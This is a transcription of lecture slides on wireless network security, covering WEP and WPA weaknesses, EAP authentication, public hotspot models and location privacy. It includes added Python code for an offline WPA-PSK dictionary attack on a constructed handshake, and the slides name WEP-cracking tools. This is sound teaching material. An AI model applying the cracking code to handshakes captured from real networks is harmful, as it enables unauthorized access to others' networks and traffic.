![Page 1: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/1.jpg)
Wireless Network Security for Future Internet
Yasuo Okabe, Academic Center for Computing and Media Studies
Kyoto University
Overview
1. What is Network Security?
2. W-LAN Security Technologies
3. Security Issues on Public Wireless Internet Access Services
4. Location Privacy
5. Summary
1. What is Network Security? (a brief introduction)
What is Network Security?
(Figure: a sender sends a message to a recipient; an adversary on the path may interrupt, eavesdrop, masquerade, fabricate, or modify.)
Active Attacks and Passive Attacks
• Active attacks
– Interruption: denial of service (DoS)
– Masquerade
– Fabrication: e.g. replay of a captured message
– Modification
• Passive attacks
– Eavesdropping (or wiretapping): obtain the content of messages without the sender or recipient being aware of it
– Monitoring (traffic analysis): observe who sends a message to whom, and when
Passive attacks are more difficult to detect than active attacks, since they leave no trace on the channel.
Repudiation
• The sender denies having sent the message. Possible explanations:
– The sender is lying.
– The recipient is lying.
– An adversary fabricated the message.
• The recipient denies having received the message. Possible explanations:
– The sender is lying.
– The recipient is lying.
– An adversary masqueraded as the recipient.
• The received message differs from what was sent. Possible explanations:
– The sender is lying.
– The recipient is lying.
– An adversary modified it.
(Figure: sender, message, recipient, adversary; a brace marks "both", i.e. in every case either party could be the one lying.)
Being firmly convinced that the other party is lying is meaningless if one cannot prove it to a third party.
Network Security
• Attributes in computer security: Confidentiality, Integrity, Availability
• Additional attributes for communication:
– Concealment: assure that the fact that communication takes place between the sender and the recipients stays unnoticed by others
– Authentication: confirm that both the sender and the recipients are actually authorized to take part in the communication
– Non-repudiation: prevent either the sender or the recipient from denying the communication
  • When a message is sent, the recipient can prove that the message came from the sender, and vice versa.
2. W-LAN Security Technologies
Wireless LAN
• IEEE 802.11
– A set of standards for wireless local area networks (W-LAN)
– Developed by the IEEE LAN/MAN Standards Committee (IEEE 802)
  • IEEE 802.11 (1997), 802.11b (1999), 802.11a (1999), 802.11g (2003)
  • IEEE 802.11i (2004)
• Wi-Fi (Wireless Fidelity)
– A family of related specifications based on IEEE 802.11 but slightly modified
– Specified by the Wi-Fi Alliance
W-LAN Security
• Access control at access points
– Stealth (hidden) ESSID
  • Stop announcing the ESSID (Extended Service Set ID). But the ESSID can still be sniffed by monitoring, since clients send it in clear in probe and association frames.
– MAC address registration
  • Deny frames from a client whose MAC address is not registered. But MAC addresses can be sniffed and spoofed.
– WEP, WPA, … (discussed later)
• Restrictions at access points
– IP address restriction / port filtering
– Disabling direct communication among clients (client isolation)
WEP (Wired Equivalent Privacy)
• Authentication and encryption by a WEP key
– 64-bit WEP (40-bit key + 24-bit IV)
– 128-bit WEP (104-bit key + 24-bit IV)
• Two modes of authentication
– Open System authentication
  • No actual authentication at association, but data is encrypted with the WEP key
– Shared Key authentication
  • Four-way challenge-response handshake at association
  • Caveat: the handshake exposes a challenge and its WEP encryption, i.e. a key stream, to anyone listening, so Shared Key mode is in practice weaker than Open System mode.
WEP Encryption Details
(Figure: the 24-bit IV (Initialization Vector) is prepended to the WEP key to seed RC4; the resulting key stream is XORed (exclusive OR) with the plaintext data followed by its CRC-32 ICV (Integrity Check Value). The transmitted frame consists of MAC header, IV in clear, encrypted data, encrypted ICV, and the FCS (Frame Check Sequence).)
The IV, and hence the key stream, changes from frame to frame so that the same key stream is not reused for different data. Note that it adds nothing against brute force of the WEP key, because the IV is sent in clear.
Vulnerability of WEP
• The IV is relatively short
– 2^24 ≈ 16,000,000 values
  • That many frames can be sent in about 10 minutes on a 54 Mbps W-LAN (with small frames). A repeated IV is expected much earlier: by the birthday bound, after only a few thousand frames with random IVs.
– An attacker who finds two frames with the same IV obtains the XOR of the two plaintexts:
  • (D1 ⊕ K) ⊕ (D2 ⊕ K) = D1 ⊕ D2, where D1 and D2 are the original data and K is the key stream.
• The key remains static, sometimes for years.
• RC4 as used by WEP is known to be weak: the per-frame key IV || WEP key lets an attacker recover the key from captured frames with certain IVs.
Note that the cracking can be done entirely passively.
Cracking Tools
• AirSnort: http://airsnort.shmoo.com/
• Aircrack-ng: http://www.aircrack-ng.org
demo
WPA (Wi-Fi Protected Access)
• WPA-TKIP
– Improvement of WEP
– Uses a temporal key instead of the fixed WEP key
  • A key is assigned per client and per association, and changed periodically
  • TKIP: Temporal Key Integrity Protocol
– The key stream is still generated by RC4, but from a 48-bit IV (initialization vector) mixed with the temporal key
  • Avoids reuse of the same IV; the IV also serves as a replay counter, and a keyed message integrity code replaces the CRC-32 ICV
• WPA-AES
– Uses AES (Advanced Encryption Standard) instead of RC4
WPA-PSK
• WPA-PSK (Pre-Shared Key)
– Replacement of WEP for networks without an authentication server
  • The initial association between AP and client is done with a passphrase as a pre-shared key; the passphrase and the SSID are stretched into the pairwise master key, from which per-session keys are derived in the 4-way handshake
• Weaknesses
– An attacker who has the pre-shared key can eavesdrop on all packets (having captured a client's 4-way handshake, they can derive that client's session keys).
– A dictionary attack may succeed if the pre-shared key is not chosen long enough and unguessable. The attack is offline: capturing one 4-way handshake is sufficient.
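The offline dictionary attack mentioned in the weaknesses above, as an added Python example (not code from the slides or from any cracking tool). It derives the PMK from passphrase and SSID with PBKDF2 as IEEE 802.11i specifies, expands it into the PTK with the two nonces and MAC addresses of a 4-way handshake, and checks candidate passphrases against the EAPOL MIC of message 2. The handshake values, SSID and word list are constructed; the MIC uses the WPA2/CCMP form (HMAC-SHA1 truncated to 16 bytes), while WPA-TKIP uses HMAC-MD5 with the same key derivation.

```python
"""Offline dictionary attack on WPA/WPA2-PSK from one captured 4-way
handshake. Added example, not code from the slides or from any tool.
Key derivation per IEEE 802.11i:
  PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
  PTK = PRF-512(PMK, "Pairwise key expansion",
                min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
  KCK = PTK[0:16] keys the EAPOL MIC.
The handshake values below are constructed, not captured."""

import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """AA and SPA are the AP and station MAC addresses (6 bytes each)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_with_zeroed_mic: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 over the EAPOL frame, MIC field zeroed."""
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


def dictionary_attack(ssid, aa, spa, anonce, snonce, eapol_zeroed, mic, wordlist):
    """Return the passphrase whose derived KCK reproduces the captured MIC,
    or None if no candidate matches. Cost per candidate is one PBKDF2."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), mic):
            return candidate
    return None


def build_sample_capture(passphrase: str, ssid: str):
    """Construct what a sniffer records from messages 1 and 2: both MAC
    addresses, both nonces, the message-2 EAPOL frame with its MIC field
    zeroed, and the MIC. All values are constructed and deterministic."""
    aa = bytes.fromhex("00112233aabb")                 # constructed AP MAC
    spa = bytes.fromhex("00aabbccdd01")                # constructed station MAC
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    # Stand-in for the EAPOL-Key frame bytes (version, type, key info, ...)
    # with the 16-byte MIC field already zeroed.
    eapol_zeroed = b"\x01\x03\x00\x75\x02\x01\x0a" + bytes(16) + snonce + bytes(48)
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
    return aa, spa, anonce, snonce, eapol_zeroed, eapol_mic(kck, eapol_zeroed)


if __name__ == "__main__":
    ssid = "Kyoto-Guest"                                # constructed SSID
    capture = build_sample_capture("sunflower", ssid)   # weak, dictionary word
    wordlist = ["password", "letmein", "sunflower", "kyoto2004"]
    print("recovered passphrase:", dictionary_attack(ssid, *capture, wordlist))
```

Because the SSID is the PBKDF2 salt, tables of precomputed PMKs only help against common SSIDs; a long random passphrase defeats the attack outright, which is the whole content of the "not guessable" advice above.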
WPA-EAP
• EAP (Extensible Authentication Protocol)
• Authentication based on IEEE 802.1X with a RADIUS authentication server
• EAP-TLS
– Based on PKI
– Server and client mutually authenticate by certificates
• EAP-PEAP
– ID/password based; use of PKI on the client side is optional
– MS-CHAP v2 inside the TLS tunnel: server and client mutually authenticate via ID/password
• EAP-SIM
– Using a SIM (GSM Subscriber Identity Module)
(Figure: Mobile Node – Access Point – Corresponding Node, with the Authentication Server reached through the AP.)
Comparison of IEEE 802.1X EAP methods
• EAP (Extensible Authentication Protocol)
Method     Client Authentication   Server Authentication   Security Level   Operation Cost
EAP-TLS    Certificate             Certificate             High             High
EAP-TTLS   ID/Password             Certificate             Mid.             Mid.
EAP-PEAP   ID/Password             Certificate             Mid.             Mid.
LEAP       ID/Password             ID/Password             Low              Low
EAP-MD5    ID/Password             ---                     Low              Low
How to use EAP-TLS based on PKI
(Figure: certificate enrollment flow. The user applies through an application server (web); the RA operator identifies the user and the RA administrator authorizes the request, with authority delegated through an admin server (web); the RA sends an issue request to the CA, whose administrator issues the certificate, delivered to the user on a smart card ("TARO SUZUKI 08/07"). On the network side the AP authenticates against RADIUS, which consults LDAP.)
OpenWRT (http://openwrt.org/)
– Alternative firmware for commodity W-LAN routers
  • Supports many platforms, including Buffalo's products
– Open source, based on Linux
  • CLI
  • Supports many features such as 802.1X with RADIUS, VPN, etc.
  • Customizable by users themselves
DD-WRT (http://www.dd-wrt.com/wiki/)
• A branch of OpenWRT
• GUI
3. Security Issues on Public Wireless Internet Access Service
Status of public wireless Internet access
• Remarkably rapid deployment of IEEE 802.11b/g W-LAN in the last 10 years
– Now almost all notebook PCs have W-LAN built in.
– Security risks and incidents have become a social problem.
• "Public wireless LAN" or "wireless hotspot"
– Public Internet access service using W-LAN technology
• Attracts the attention of the mass media
– In the U.S.
  • Bankruptcy of MobileStar (2001)
– In Japan
  • Paid services are not necessarily satisfactory
    – MIS stopped its service (2002)
    – Livedoor Wireless cancelled its plan to extend coverage
    – Each NTT group company provides a service in an unsystematic way: HOTSPOT (NTT.com), M-Zone (NTT DoCoMo), Wireless LAN Club (NTT BP), FletsSpot (NTT East/West)
Difficulty in the business model of public wireless Internet access service
• Issues in coverage area
– Conflict among service providers at public hot spots like railway stations, airports, hotels
  • The number of channels in IEEE 802.11b/g is very small
– In most places only one service is available
  • Only users who subscribe to that service can use it.
– Most of the spots are located in metropolises, few in local cities.
– Covers only spots, not areas
  • Enormous investment is needed to cover an area, compared to 3G mobile phone service
  • Several projects conducted by local governments in the U.S. have been suspended.
Free Wireless Services
• FON: http://www.fon.com
• Google WiFi: http://wifi.google.com
• eduroam: http://www.eduroam.org
• FreeSpot: http://www.freespot.com
Google WiFi
• A free wireless Internet service in Mountain View by Google
– More than 400 APs
– Service area: almost the whole area of 18 km²
– Unique users: 15,000/month
"We're offering to the city of Mountain View as part of our ongoing efforts to reach out to our hometown."
http://wifi.google.com/city/mv/apmap.html
eduroam
– W-LAN roaming architecture among academic and research institutions in Europe and other countries
– IEEE 802.1X (EAP-TTLS) + RADIUS federation
– Roaming between commercial service providers in Europe (experimental)
Is FREE service really possible?
• We already have the Internet infrastructure.
– Most offices, shops and houses have broadband access.
  • ADSL (1 to 10 Mbps), FTTH (100 Mbps to 1 Gbps)
• Providing it to visitors is feasible
– We rarely consume the bandwidth fully
– A wireless service costs little.
• The issue is security
– Risk of providing network access to unknown visitors
  • Access to the private network can be prohibited, but
  • Malicious access to the Internet is hard to limit
Security in public wireless Internet services
• What is the difference between a private W-LAN and public wireless access?
– For users:
  • Eavesdropping, MITM (man-in-the-middle) attacks
  • Masquerading (impersonation)
– For the hosts of the access points:
  • Accounting (in paid services only)
  • Avoiding anonymous use
Limitation of wireless-LAN authentication and encryption technologies for public wireless service
• Stealth ESSID?
– The ESSID must be announced to the public.
• MAC address filtering
– Can very easily be spoofed
– Issues in scalability
• WEP (encryption)
– Pre-shared key; the key is shared by all users
• WPA-EAP
– IEEE 802.1X; cannot be used in public services as is
In every case, encryption is done only on the wireless section (between AP and client).
ISP type W-LAN service
• Features
– Centralized management by the ISP
  • Wireless APs and the access network are owned by the ISP
  • The ISP manages the authentication server and issues accounts
– Subscribers must rely on the ISP
• Issues
– A contract is needed between the ISP and each subscriber
(Figure: Mobile Node – Access Point – ISP network – Corresponding Node; (1) authorization by the Authentication Server, (2) data. AS: authentication server, AP: access point, MN: mobile node, CN: corresponding node.)
Wireless Internet Service by a single ISP
(Figure: the MN (mobile node) mutually authenticates with the ISP's auth server through the AP (access point); data passes over the ISP's private network to the Internet and the CN (corresponding node). The mutual trust relation is between the MN and the ISP.)
WLAN roaming among ISPs
(Figure: the MN attaches to an access point of the roam ISP; authentication is forwarded to the AAA server of the home ISP; data goes from the roam ISP to the Internet and the CN. Examples: iPass, eduroam.)
The mutual trust relation is between the MN and its home ISP; a trust relation between the home ISP and the roam ISP is also necessary.
Self-managed model
• Features
– Managed independently, typically with one or a few APs
  • Daily operational cost is not so high.
– Security policy depends on the host person
– Grass-roots deployment is possible
• Issues
– Very costly to assure a security level high enough that the user can be traced when an incident occurs.
– No protection if the host person has malicious intent.
(Figure: Mobile Node – Access Point – host person's network – Corresponding Node; (1) authentication at the AP, if any, (2) data.)
Self-managed FreeSpot (free service)
(Figure: MN – AP – Internet – CN, with only naïve authentication by the host person of the APs. A malicious adversary can eavesdrop, masquerade or fabricate, and either party can repudiate.)
Comparison of Public WLAN Service Models
(Figure: a chart of security (low to high) against management cost (low to high). The self-managed model sits at low cost and low security, the ISP model at high cost and high security; the autonomous distributed model is placed between them as a framework to enhance the security of the self-managed network model.)
Autonomous Distributed Model
(Figure: Mobile Node – Access Point, in the AP host's network (assuming little confidentiality) – Corresponding Node; the Authentication Server sits in the separate network of the authentication system. Flows: authentication, authorization, data.)
Categorization of Security Procedures of Autonomous Distributed Public WLAN services
• Categorize authentication mechanisms based on the following two aspects:
  • Authentication transaction at the access point: relayed, or passed through
  • Data path: tunneling, or direct
[ Properties and Name of Each Model ]
Data path   No auth. at AP (passed through)   Auth. at AP (relayed)
Tunnel      PATP                              RATP
Direct      PADP                              RADP
[ Pros and Cons of Four Models ]
• Authentication treatment at the AP
  • Relayed: eliminates malformed authentication attempts before they reach the server, but makes the AP busier
• Data path
  • Tunneling: gives the MN location privacy, but forces a detour via the AS
In the other case (passed through, direct) the pros and cons are reversed.
Passed-through Authentication, Tunneling Path (PATP) Model
(Figure: Mobile Node – Access Point – Tunneling Server – Corresponding Node. (1) authentication passes through the AP to the tunneling server, (2) authorization; data then flows in a VPN tunnel from the MN through the AP to the tunneling server and on to the CN.)
Relayed Authentication, Tunneling Path (RATP) Model
(Figure: Mobile Node – Access Point – Tunneling & Authentication Server – Corresponding Node. (1) authentication to the AP, (2) relay of (1) to the server, followed by authorization and tunneled data, steps (3) to (5).)
Passed-through Authentication, Direct Path (PADP) Model
(Figure: Mobile Node – Access Point – Corresponding Node, with the Authentication Server reached through the AP. Authentication passes through the AP to the AS, the AP and the AS exchange ID information, and data goes directly to the CN, steps (1) to (3).)
Relayed Authentication, Direct Path (RADP) Model
(Figure: Mobile Node – Access Point – Corresponding Node, Authentication Server. (1) authentication to the AP, (2) relayed to the AS, (3) authorization, (4) data directly to the CN.)
Implementation in MIAKO.net
(Figure: MN – AP – Internet – CN, plus a VPN server. APs are hosted either by users themselves or by an ISP; the AP passes through VPN protocols only; the mutual trust relation is between the MN and the VPN server.)
4. Location Privacy
What is Location Privacy?
• Location privacy concerns the combination of when and where you are, and who you are
• Your location privacy is expected to be disclosed to none of
– the corresponding node
– the authentication server
– the access point
• Trade-offs with
– Anonymity vs. security
– Location-aware services
(Figure: Corresponding Node, Mobile Node ("You are here!"), Access Point, Authentication Server.)
Location privacy in ISP type W-LAN service
• The authentication server knows
– who you are
– where you are now
– to whom you are communicating
• Users are forced to rely on the service provider, as is already the case with mobile phone carriers.
(Figure: Mobile Node – Access Point – Corresponding Node, Authentication Server; (1) authorization, (2) data.)
Location Privacy in Roaming Service
(Figure: Corresponding Node, Mobile Node, Access Point, Authentication Server.)
• The authentication server knows who you are and where you are
• The access point may know where you are, who you are, and to whom you are communicating
• The corresponding node will know where the MN is
How a pseudonym conceals location privacy in roaming service
(Figure: the Mobile Node accesses the roam ISP's Access Point with a pseudonym; the roam ISP's authentication proxy server forwards the authentication to the home ISP's Authentication Server; data goes to the Corresponding Node.)
• The access point may know where you are, to whom you are communicating, and which is your home ISP, but not who you are
• The authentication server may know who you are and which roam ISP you are using, but not where you are
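How the pseudonym and the authentication proxy described above (and the EAP-TTLS + RADIUS federation of the eduroam slide) split what each party learns, as an added Python model. It is not code from the slides or from eduroam; the realm table, host names and log layout are assumptions, and no RADIUS messages are sent. The pseudonym is the outer EAP identity "anonymous@realm" sent in clear, the real user name travels only inside the TLS tunnel to the home server, and the realm alone is what the proxy needs for routing.

```python
"""Pseudonymous outer identity and realm-based proxying for W-LAN roaming.
Added example (not from the slides or eduroam); names are constructed."""

from dataclasses import dataclass, field

# Constructed federation routing table: realm -> home authentication server.
REALM_TABLE = {
    "kyoto-u.example": "radius.kyoto-u.example",
    "home-isp.example": "aaa.home-isp.example",
}


def split_nai(identity: str):
    """Split a Network Access Identifier 'user@realm' into its two parts."""
    if "@" not in identity:
        return identity, None
    user, realm = identity.rsplit("@", 1)
    return user, realm.lower()


def outer_identity(inner_identity: str) -> str:
    """Pseudonym sent in clear in EAP-Response/Identity: only the realm
    survives, which is all the proxies need for routing."""
    _, realm = split_nai(inner_identity)
    if not realm:
        raise ValueError("roaming requires a realm in the identity")
    return "anonymous@" + realm


@dataclass
class Logs:
    roam_proxy: list = field(default_factory=list)   # kept by the roam ISP
    home_server: list = field(default_factory=list)  # kept by the home ISP


def roam_authenticate(inner_identity: str, ap_location: str, proxy_name: str,
                      logs: Logs, credential_ok) -> bool:
    """One roaming login. credential_ok(user) stands in for the home ISP's
    check of the inner (tunnelled) credential. Returns the access decision."""
    outer = outer_identity(inner_identity)
    _, realm = split_nai(outer)
    home = REALM_TABLE.get(realm)
    # Roam ISP side: records pseudonym, AP location and where it proxied to.
    if home is None:
        logs.roam_proxy.append((outer, ap_location, "reject: unknown realm"))
        return False
    logs.roam_proxy.append((outer, ap_location, "proxied to " + home))
    # Home ISP side: sees the real identity and the forwarding proxy only;
    # the AP location never reaches it.
    user, _ = split_nai(inner_identity)
    ok = credential_ok(user)
    logs.home_server.append((inner_identity, proxy_name, "accept" if ok else "reject"))
    return ok


def log_reveals(log_entries, needle: str) -> bool:
    """True if any field of any entry in this party's log contains needle."""
    return any(needle in str(fld) for entry in log_entries for fld in entry)


if __name__ == "__main__":
    logs = Logs()
    roam_authenticate("taro@kyoto-u.example", "AP-OsakaStation-3",
                      "proxy.roam-isp.example", logs, lambda u: u == "taro")
    print("roam proxy log:", logs.roam_proxy)
    print("home server log:", logs.home_server)
```

The split only holds if the tunnel is real: with EAP-MD5 or LEAP from the comparison table there is no tunnel, the inner identity is the outer one, and the access point learns who you are after all.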
Location privacy in VPN-based Tunneling Path Model
(Figure: Mobile Node – Access Point (roam ISP) – VPN tunnel – Tunneling Server (home ISP) – Corresponding Node; authorization, then data through the tunnel.)
• The authentication server knows who you are and where you are
• The access point cannot know to whom you are communicating
• The corresponding node cannot know where the MN is
5. Summary
Summary
• Security issues of W-LAN roaming services
• Proposal of an autonomous distributed public wireless Internet access architecture
– MIAKO.net
– A service model for implementing ubiquitous networking with grass-roots W-LAN roaming and enough security
[ Concluding Remarks ]
• Categorized security problems of public WLAN services
• Proposed an Autonomous Distributed public WLAN service model
• Compared some security procedures of the Autonomous Distributed public WLAN service
• Each procedure has its pros and cons, therefore we cannot say which is the best for future use
• The MIAKO.NET public wireless service is based on the PATP model
[ References ]
• A. Balachandran et al., "Wireless Hotspots: Current Challenges and Future Directions", 2003
• N. Borisov et al., "(In)Security of the WEP Algorithm", 2001
• D. Golombek, "Single Computer Breaks 40-bit RC4 in under 8 Days", 1996
• T. Komura et al., "The MIAKO.NET Public Wireless Internet Service in Kyoto", 2003
• Y. Matsunaga et al., "Secure Authentication System for Public WLAN Roaming", 2003
• L. Ackerman et al., "Wireless Location Privacy: Law and Policy in the U.S., EU and Japan", ISOC Member Briefing, 2003